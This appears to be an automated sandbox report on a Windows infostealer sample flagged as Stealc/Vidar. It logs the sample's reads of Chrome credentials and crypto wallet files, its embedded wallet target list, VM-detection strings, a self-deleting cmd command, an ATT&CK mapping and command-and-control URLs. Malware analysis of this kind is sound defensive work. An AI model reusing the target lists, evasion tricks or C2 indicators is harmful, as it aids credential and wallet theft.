Source: C:\Users\user\Desktop\un78exGoa4.exe	Code function: 0_2_0040117A FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040117A
Source: C:\Users\user\Desktop\un78exGoa4.exe	Code function: 0_2_0040B202 strtok_s,wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_0040B202
Source: C:\Users\user\Desktop\un78exGoa4.exe	Code function: 0_2_0040B62A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_0040B62A
Source: C:\Users\user\Desktop\un78exGoa4.exe	Code function: 0_2_0040BF33 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040BF33
Source: C:\Users\user\Desktop\un78exGoa4.exe	Code function: 0_2_00406BD7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_00406BD7
Source: C:\Users\user\Desktop\un78exGoa4.exe	Code function: 0_2_004086F1 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_004086F1
Source: C:\Users\user\Desktop\un78exGoa4.exe	Code function: 0_2_0040827F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040827F
Source: C:\Users\user\Desktop\un78exGoa4.exe	Code function: 0_2_0040BBCE GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_0040BBCE
Source: C:\Users\user\Desktop\un78exGoa4.exe	Code function: 0_2_00407FA8 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_00407FA8

Source: C:\Users\user\Desktop\un78exGoa4.exe	API call chain: ExitProcess graph end node	graph_0-6905
Source: C:\Users\user\Desktop\un78exGoa4.exe	API call chain: ExitProcess graph end node	graph_0-7875
Source: C:\Users\user\Desktop\un78exGoa4.exe	API call chain: ExitProcess graph end node	graph_0-6900
Source: C:\Users\user\Desktop\un78exGoa4.exe	API call chain: ExitProcess graph end node	graph_0-10278
Source: C:\Users\user\Desktop\un78exGoa4.exe	API call chain: ExitProcess graph end node	graph_0-10417
Source: C:\Users\user\Desktop\un78exGoa4.exe	API call chain: ExitProcess graph end node	graph_0-6913
Source: C:\Users\user\Desktop\un78exGoa4.exe	API call chain: ExitProcess graph end node	graph_0-6909
Source: C:\Users\user\Desktop\un78exGoa4.exe	API call chain: ExitProcess graph end node	graph_0-7094
Source: C:\Users\user\Desktop\un78exGoa4.exe	API call chain: ExitProcess graph end node	graph_0-10376
Source: C:\Users\user\Desktop\un78exGoa4.exe	API call chain: ExitProcess graph end node	graph_0-6849

Source: C:\Users\user\Desktop\un78exGoa4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\un78exGoa4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\un78exGoa4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\un78exGoa4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\un78exGoa4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\un78exGoa4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior

Source: un78exGoa4.exe, 00000000.00000002.421176016.0000000000734000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWy
Source: un78exGoa4.exe, 00000000.00000002.421176016.000000000070A000.00000004.00000020.00020000.00000000.sdmp, un78exGoa4.exe, 00000000.00000002.421176016.0000000000734000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: un78exGoa4.exe, 00000000.00000002.421100115.00000000006B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware

Source: C:\Users\user\Desktop\un78exGoa4.exe

0_2_0040F49D

Source: C:\Users\user\Desktop\un78exGoa4.exe

Code function: 0_2_0040C550 GetProcessHeap,RtlAllocateHeap,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,lstrcat,lstrcat,lstrlen,lstrlen,

0_2_0040C550

Source: C:\Users\user\Desktop\un78exGoa4.exe

Code function: 0_2_0040F49D mov eax, dword ptr fs:[00000030h]

0_2_0040F49D

Source: C:\Users\user\Desktop\un78exGoa4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\un78exGoa4.exe" & del "C:\ProgramData\*.dll"" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5			Jump to behavior

Source: C:\Users\user\Desktop\un78exGoa4.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\un78exGoa4.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\un78exGoa4.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_0040E91A

Source: C:\Users\user\Desktop\un78exGoa4.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\un78exGoa4.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\un78exGoa4.exe

0_2_00409C83

Source: C:\Users\user\Desktop\un78exGoa4.exe

0_2_00409C83

Source: C:\Users\user\Desktop\un78exGoa4.exe

Code function: 0_2_0040E8AD strcat,GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_0040E8AD

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.421100115.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: un78exGoa4.exe PID: 7132, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: un78exGoa4.exe PID: 7132, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\un78exGoa4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\un78exGoa4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\un78exGoa4.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\un78exGoa4.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\un78exGoa4.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: un78exGoa4.exe, 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|*.config\|1\|
Source: un78exGoa4.exe, 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: un78exGoa4.exe, 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|*.config\|1\|
Source: un78exGoa4.exe	String found in binary or memory: window-state.json
Source: un78exGoa4.exe, 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Jaxx Liberty
Source: un78exGoa4.exe, 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|*.config\|1\|
Source: un78exGoa4.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: un78exGoa4.exe, 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: info.seco
Source: un78exGoa4.exe, 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|*.config\|1\|
Source: un78exGoa4.exe	String found in binary or memory: passphrase.json
Source: un78exGoa4.exe, 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: un78exGoa4.exe, 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|*.config\|1\|
Source: un78exGoa4.exe	String found in binary or memory: Exodus
Source: un78exGoa4.exe, 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: file__0.localstorage
Source: un78exGoa4.exe, 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|*.config\|1\|
Source: un78exGoa4.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: un78exGoa4.exe, 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: MultiDoge
Source: un78exGoa4.exe, 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: seed.seco
Source: un78exGoa4.exe, 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|*.config\|1\|
Source: un78exGoa4.exe, 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|*.config\|1\|

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\un78exGoa4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\un78exGoa4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\un78exGoa4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\un78exGoa4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 0.2.un78exGoa4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.421176016.0000000000734000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: un78exGoa4.exe PID: 7132, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.421100115.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: un78exGoa4.exe PID: 7132, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: un78exGoa4.exe PID: 7132, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	12 Native API	Path Interception	11 Process Injection	11 Virtualization/Sandbox Evasion	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Process Injection	1 Input Capture	11 Security Software Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	12 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	22 Software Packing	LSA Secrets	1 Account Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	3 File and Directory Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	153 System Information Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
un78exGoa4.exe	49%	ReversingLabs	Win32.Trojan.Privateloader
un78exGoa4.exe	38%	Virustotal		Browse
un78exGoa4.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://ronaldlitt.top/3abdf8b5527012d0/sqlite3.dllY	0%	Avira URL Cloud	safe
http://ronaldlitt.top/3abdf8b5527012d0/sqlite3.dll5	0%	Avira URL Cloud	safe
http://ronaldlitt.top/25d4fc7fb0cb6b78.php89c6ee431893fde88e49579e17ef5	0%	Avira URL Cloud	safe
http://ronaldlitt.top	0%	Avira URL Cloud	safe
http://ronaldlitt.top/25d4fc7fb0cb6b78.php	100%	Avira URL Cloud	phishing
http://ronaldlitt.top/25d4fc7fb0cb6b78.phption:	100%	Avira URL Cloud	phishing
http://ronaldlitt.top/3abdf8b5527012d0/sqlite3.dll	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ronaldlitt.top	193.106.175.215	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ronaldlitt.top/25d4fc7fb0cb6b78.php	true	Avira URL Cloud: phishing	unknown
http://ronaldlitt.top/3abdf8b5527012d0/sqlite3.dll	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	FCFIJEBF.0.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	un78exGoa4.exe, 00000000.00000002.421176016.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, FCFIJEBF.0.dr	false		high
http://ronaldlitt.top/3abdf8b5527012d0/sqlite3.dllY	un78exGoa4.exe, 00000000.00000002.421176016.000000000070A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	un78exGoa4.exe, 00000000.00000002.421176016.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, FCFIJEBF.0.dr	false		high
http://ronaldlitt.top/25d4fc7fb0cb6b78.phption:	un78exGoa4.exe, 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmp, un78exGoa4.exe, 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: phishing	unknown
https://duckduckgo.com/ac/?q=	FCFIJEBF.0.dr	false		high
http://ronaldlitt.top/25d4fc7fb0cb6b78.php89c6ee431893fde88e49579e17ef5	un78exGoa4.exe, 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmp, un78exGoa4.exe, 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	un78exGoa4.exe, 00000000.00000002.421176016.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, FCFIJEBF.0.dr	false		high
https://search.yahoo.com?fr=crmas_sfpf	un78exGoa4.exe, 00000000.00000002.421176016.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, FCFIJEBF.0.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	FCFIJEBF.0.dr	false		high
http://ronaldlitt.top	un78exGoa4.exe, 00000000.00000002.421100115.00000000006B5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	un78exGoa4.exe, 00000000.00000002.421176016.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, FCFIJEBF.0.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	FCFIJEBF.0.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	un78exGoa4.exe, 00000000.00000002.421176016.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, FCFIJEBF.0.dr	false		high
http://ronaldlitt.top/3abdf8b5527012d0/sqlite3.dll5	un78exGoa4.exe, 00000000.00000002.421176016.000000000070A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
